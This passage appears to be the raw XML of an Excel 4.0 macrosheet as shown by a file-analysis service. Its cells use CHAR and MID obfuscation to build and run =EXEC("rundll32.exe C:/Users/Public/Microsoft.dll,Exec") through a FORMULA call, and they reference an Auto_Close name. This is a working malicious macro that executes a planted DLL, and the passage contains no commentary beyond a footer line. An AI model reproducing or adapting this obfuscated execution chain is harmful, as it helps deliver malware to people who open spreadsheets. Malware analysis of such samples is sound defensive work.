t="str"><f>CONCATENATE(CHAR(114),CHAR(117),CHAR(110),CHAR(100),CHAR(108),CHAR(108),CHAR(51),CHAR(50),CHAR(46),CHAR(101),CHAR(120),CHAR(101),CHAR(32),CHAR(67),CHAR(58))</f><v>rundll32.exe C:</v></c></row><row r="475" spans="23:23"><c r="W475" s="1" t="str"><f>CONCATENATE(CHAR(47),CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(115),CHAR(47),CHAR(80),CHAR(117),CHAR(98),CHAR(108),CHAR(105),CHAR(99),CHAR(47))</f><v>/Users/Public/</v></c></row><row r="476" spans="23:23"><c r="W476" s="1" t="str"><f>CONCATENATE(CHAR(77),CHAR(105),CHAR(99),CHAR(114),CHAR(111),CHAR(115),CHAR(111),CHAR(102),CHAR(116),CHAR(46),CHAR(100),CHAR(108),CHAR(108),CHAR(44))</f><v>Microsoft.dll,</v></c></row><row r="477" spans="23:23"><c r="W477" s="1" t="str"><f>CONCATENATE(CHAR(69),CHAR(120),CHAR(101),CHAR(99))</f><v>Exec</v></c></row><row r="478" spans="23:23"><c r="W478" s="1" t="str"><f>CONCATENATE(_xlnm.Auto_Close1,W475,W476,W477)</f><v>rundll32.exe C:/Users/Public/Microsoft.dll,Exec</v></c></row><row r="481" spans="23:23"><c r="W481" s="4" t="str"><f>CONCATENATE(MID("=",1,1),MID("E",1,1),MID("X",1,1),MID("E",1,1),MID("C",1,1),MID("(",1,1),CHAR(34))</f><v>=EXEC("</v></c></row><row r="482" spans="23:23"><c r="W482" s="4" t="str"><f>CONCATENATE(CHAR(34),MID(")",1,1))</f><v>")</v></c></row><row r="483" spans="23:23"><c r="W483" s="4" t="str"><f>CONCATENATE(W481,W478,W482)</f><v>=EXEC("rundll32.exe C:/Users/Public/Microsoft.dll,Exec")</v></c></row><row r="484" spans="23:23"><c r="W484" s="1" t="b"><f>FORMULA(W483,W573)</f><v>1</v></c></row><row r="573" spans="23:23"><c r="W573" s="1" t="s"><v>1</v></c></row><row r="574" spans="23:23"><c r="W574" s="1" t="b"><f>FORMULA("Done",W573)</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.